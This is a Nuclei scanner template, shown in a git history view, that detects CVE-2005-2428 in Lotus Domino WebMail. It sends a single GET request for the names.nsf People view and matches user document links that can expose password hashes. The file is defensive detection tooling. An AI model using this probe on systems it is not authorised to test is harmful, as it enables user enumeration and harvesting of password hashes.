nuclei-templates/http/cves/2005/CVE-2005-2428.yaml

45 lines
1.6 KiB
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2005-2428
info:
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
author: CasperGN
severity: medium
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
reference:
2021-04-22 08:59:05 +00:00
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
2023-07-11 19:49:27 +00:00
- http://marc.info/?l=bugtraq&m=112240869130356&w=2
- http://securitytracker.com/id?1014584
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2005-2428
cwe-id: CWE-200
2023-07-11 19:49:27 +00:00
epss-score: 0.01188
cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.83354
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: ibm
product: lotus_domino
tags: domino,edb,cve,cve2005
http:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
2023-07-11 19:49:27 +00:00
2020-09-09 18:44:26 +00:00
matchers-condition: and
matchers:
- type: regex
name: domino-username
2023-07-11 19:49:27 +00:00
part: body
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200